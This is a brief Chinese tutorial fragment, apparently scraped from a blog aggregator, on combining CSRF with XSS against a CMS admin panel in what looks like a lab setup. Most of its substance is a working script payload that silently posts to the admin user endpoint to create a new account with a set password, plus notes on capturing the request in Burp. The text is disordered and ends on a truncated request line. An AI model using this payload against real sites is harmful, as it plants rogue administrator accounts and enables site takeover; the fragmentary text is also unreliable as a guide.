修改cms网站后台管理员密码
CSRF和XSS结合的JS代码:
<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.4.7.130/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=ajest&password=123.com&password2=123.com&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>
登录cms管理员后台,创建一个新账户:
文章来源:https://www.toymoban.com/news/detail-690727.html
修改密码并用bp抓包,抓到的post请求包如下:文章来源地址https://www.toymoban.com/news/detail-690727.html
POST /cms/admin/user.action.ph
到了这里,关于CSRF与XSS结合利用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!